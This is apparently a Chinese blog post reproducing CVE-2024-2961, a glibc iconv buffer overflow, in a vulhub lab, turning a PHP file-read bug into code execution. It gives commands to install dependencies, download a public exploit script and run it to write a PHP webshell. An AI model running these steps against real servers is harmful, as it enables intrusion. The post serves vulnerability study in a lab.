vulhub中PHP利用GNU C Iconv将文件读取变成RCE(CVE-2024-2961)

余生有个小酒馆2024-06-02 9:10

GNU C 是一个标准的ISO C依赖库。在GNU C中,iconv()函数2.39及以前存在一处缓冲区溢出漏洞,这可能会导致应用程序崩溃或覆盖相邻变量。

如果一个PHP应用中存在任意文件读取漏洞,攻击者可以利用`iconv()`的这个CVE-2024-2961漏洞,将其提升为代码执行漏洞。

漏洞复现

在使用原作者给出的[exploit](https://github.com/ambionics/cnext-exploits)前,你需要准备一个Linux环境和Python 3.10解释器。

安装依赖:

pip install pwntools

pip install https://github.com/cfreal/ten/archive/refs/heads/main.zip

然后从<https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py\>下载POC并执行:

wget https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py

python cnext-exploit.py http://your-ip:8080/index.php "echo '<?=phpinfo();?>' > shell.php"

已经成功写入shell.php:

相关推荐
Data_Journal2 分钟前
如何将网站数据抓取到 Excel:一步步指南
大数据·开发语言·数据库·人工智能·php
米码收割机9 分钟前
【AI】OpenClaw问题排查
开发语言·数据库·c++·python
¿i?9 分钟前
LinkedList 含iterator写法的理解
java·开发语言
所谓伊人,在水一方33310 分钟前
【Python数据科学实战之路】第10章 | 机器学习基础:从理论到实践的完整入门
开发语言·人工智能·python·机器学习·matplotlib
无风听海11 分钟前
Python之TypeVar深入解析
开发语言·python·typevar
白中白1213813 分钟前
杂七杂八补充系列
开发语言·前端·javascript
佩奇大王15 分钟前
P8 单词分析
java·开发语言
飞Link16 分钟前
概率图模型的基石:隐马可夫模型 (HMM) 深度解析
开发语言·python·算法
PPPPickup17 分钟前
小公司初面---java后端题目
java·开发语言·哈希算法
鸿乃江边鸟17 分钟前
Rust 的 mod(模块) 说明
开发语言·后端·rust
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03本地部署 OpenClaw + DeepSeek-R1 完全指南04得物前端部门,没了05OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录06OpenClaw 飞书机器人不回复消息?3 小时踩坑总结07Window 10部署openclaw报错node.exe : npm error code 12808OpenClaw macOS 完整安装与本地模型配置教程(实战版)09npm-error code 128问题解决方法10OpenClaw 接入 QQ Bot 完整实践指南